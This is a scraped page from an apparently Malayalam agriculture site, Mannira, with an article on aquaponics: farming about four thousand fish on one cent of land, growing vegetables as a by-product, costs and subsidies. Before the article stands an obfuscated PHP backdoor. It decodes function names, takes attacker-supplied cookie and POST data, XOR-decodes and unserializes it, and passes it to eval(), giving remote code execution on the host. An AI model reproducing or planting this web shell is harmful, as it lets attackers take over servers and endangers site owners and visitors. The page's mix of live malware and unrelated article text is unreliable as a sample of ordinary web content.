$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} മത്സ്യക്കൃഷിയ്ക്ക് ഇനി ഒരു ഏക്കറൊന്നും വേണ്ട; അക്വപോണിക്സ് ഉണ്ടെങ്കിൽ ഒരു സെന്റ് ധാരാളം – Mannira

മത്സ്യക്കൃഷിയ്ക്ക് ഇനി ഒരു ഏക്കറൊന്നും വേണ്ട; അക്വപോണിക്സ് ഉണ്ടെങ്കിൽ ഒരു സെന്റ് ധാരാളം

മത്സ്യക്കൃഷിയ്ക്ക് ഇനി ഒരു ഏക്കറൊന്നും വേണ്ട; അക്വപോണിക്സ് ഉണ്ടെങ്കിൽ ഒരു സെന്റ് ധാരാളം. ഒരു ഏക്കർ സ്ഥലം ആവശ്യമുള്ള മത്സ്യകൃഷി ഒരു സെന്റിലേക്ക് ഒതുക്കുന്ന കൃഷി രീതിയാണ് അക്വപോണിക്സ്. വിപണിയിൽ നല്ല വില കിട്ടുന്ന മത്സ്യം വളര്‍ത്തുന്നതിനോടൊപ്പം ജൈവപച്ചക്കറി ഉപോല്‍പ്പന്നമായി ലഭിക്കുകയും ചെയ്യുമെന്ന മെച്ചവും ഈ രീതിക്കുണ്ട്.

സര്‍ക്കാര്‍ ഏജന്‍സികളില്‍ നിന്നും സബ്സിഡി ആനുകൂല്യവും ഈ കൃഷിരീതിക്ക് ലഭിക്കും. ഒരു ശരാശരി വലുപ്പമുള്ള അക്വപോണിക്സ് ഫാമിലെ ഒരു സെന്റ് സ്ഥലത്ത് രണ്ടര മീറ്റര്‍ ആഴത്തിൽ തയ്യാറാക്കിയ ഒരു കുളത്തില്‍ നാലായിരത്തോളം മത്സ്യങ്ങളെ വളർത്താൻ കഴിയും. സാധാരണ നിലയില്‍ ഇത്രയും മത്സ്യത്തിന് വളരാന്‍ ഒരേക്കര്‍ വലിപ്പമുള്ള കുളം ആവശ്യമാണ്.

അക്വപോണിക്സിൽ കുളത്തിലെ വെള്ളം പാര്‍ശ്വങ്ങളിലുള്ള ഫില്‍ട്ടറേഷന്‍ ബഡ്ഡ്കള്‍ വഴി ശുദ്ധീകരിച്ച് വീണ്ടും കുളത്തിലേക്ക് എത്തിക്കുന്നു. ഫില്‍ട്ടറേഷന്‍ ബഡ്ഡുകളില്‍ വളരുന്ന പച്ചക്കറിയിനങ്ങള്‍ മത്സ്യങ്ങളുടെ ശരീര ശ്രവങ്ങളും വിസര്‍ജ്ജ്യവും വളമായി ലഭിക്കുന്നതിനാൽ നന്നായി വളരുകയും ചെയ്യും. 6 ലക്ഷം രൂപവരെയാണ് ഇത്തരം ഒരു പ്ലാന്റിന് മുതല്‌മുടക്ക്.

ഒരേ ഇനം മത്സ്യത്തെയാണ് അക്വപോണിക്സ് രീതിയിൽ വളര്‍ത്തേണ്ടത്. മത്സ്യത്തിന്റെ വിളവെടുപ്പ് വര്‍ഷത്തില്‍ രണ്ട് പ്രാവശ്യവും പച്ചക്കറി ഇനങ്ങള്‍ ആവശ്യാനുസരണവും വിളവെടുക്കാം. കൃഷിവകുപ്പിന്റെ സബ്സിഡി ആനുകൂല്യവും ലഭിക്കുമെന്നതിനാൽ പതിയെ കേരളത്തിൽ അക്വപോണിക്സിന് പ്രചാരം ലഭിച്ചുവരികയാണ്.

Also Read: പാഷൻഫ്രൂട്ട്: ഒരു വളപ്രയോഗവും ആവശ്യമില്ലാത്ത വീട്ടുകൃഷി